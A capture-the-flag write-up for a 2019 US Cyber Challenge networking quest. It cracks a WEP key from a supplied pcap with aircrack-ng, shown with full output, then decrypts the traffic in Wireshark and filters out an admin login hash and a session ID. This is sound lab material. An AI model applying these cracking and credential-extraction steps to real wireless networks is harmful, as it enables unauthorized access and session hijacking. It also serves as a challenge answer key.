June 22, 2019
๐ด๏ธ Website : https://uscc.cyberquests.org/
This Cyber Quest covers a wide range of topics on networking, including firewalls, routers, Wi-Fi, and packet analysis.
Tools that you may need include Wireshark, aircrack-ng, and exiftool (all of which are included in many security-focused Linux distributions, including Kali Linux).
Some questions refer to files contained within this ZIP file: ๐ Spring 2019 Cyber Quest Resources .
โ
We will use aircrack-ng to analysis the file and get BSSID of the WAP.
01) Install Aircrack-ng
https://www.aircrack-ng.org/doku.php?id=install_aircrack
02) Open terminal and run aircrack-ng command as following :
aircrack-ng WiFi.pcap
$ aircrack-ng WiFi.pcap
Opening WiFi.pcapplease wait...
Read 53337 packets.
# BSSID ESSID Encryption
1 24:F5:A2:11:F7:6A Home_Net WEP (0 IVs)
Choosing first network as target.
Opening WiFi.pcapplease wait...
Read 53337 packets.
1 potential targets
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 15273 ivs.
Aircrack-ng 1.5.2
[00:00:03] Tested 2792 keys (got 15273 IVs)
KB depth byte(vote)
0 1/ 5 6B(21760) 0B(19968) CF(19968) B5(19712) 98(19200) E8(19200)
1 0/ 2 F7(23808) 17(21760) 19(20224) BB(19968) 10(19968) 9F(19712)
2 1/ 6 F7(21760) 60(20992) 1B(20736) 98(20480) 0E(20224) 91(19456)
3 7/ 11 3F(19456) 1A(19200) C3(19200) E6(19200) 91(18944) 6B(18944)
4 3/ 5 A6(20224) 94(19968) C2(19456) BE(19456) 8D(19200) 2A(19200)
KEY FOUND! [ 6B:F7:F7:3F:FC ]
Decrypted correctly: 100%
The BSSID of the WAP >
โ
01) Open the file in Wireshark.
02) Select from upper menu Statistics
> Capture File Properties
:
Capture length is >
โ
From our aircrack-ng
tool:
WEP key >
โ
01) Open file in Wireshark.
02) To add WEP Key to decrypt the traffic, From upper menu select Wireshark
->Preferences
. You should see a window that looks like this:
Select Protocols
-> IEEE 802.11
> Decryption keys [edit]
then add the WEP key from previous answer without colons 6BF7F73FFC
03) Let's search for all packets contains session_id
and word admin
using this filter:
tcp contains "session_id" && tcp contains "admin"
Notice the packet info POST /login.cgi HTTP/1.1
which is a login packet.
04) Let's examine this packet, go to packet details tab > expand HTML Form URL Encoded: application/x-www-form-urlencoded
, you will find admin login details:
Form item: "http_username" = "admin"
Form item: "http_passwd" = "ba41d75ebd1339f3a420da1db2c48dc2"
> expand Hypertext Transfer Protocol
You will find that admin granted a session_id
after successful login with session_id=f29e8307513709b98b88b8e029bb7f53
Let's check the rest of the packages, try this filter to view POST method packets:
http.request.method == "POST"
You will find admin applying some configuration to the device with same session id, to view packets data right click on packet > follow
> TCP Stream
You will find admin applying some configuration with same session
Session_id assigned to the administrator of the network device >
References :
https://wiki.wireshark.org/HowToDecrypt802.11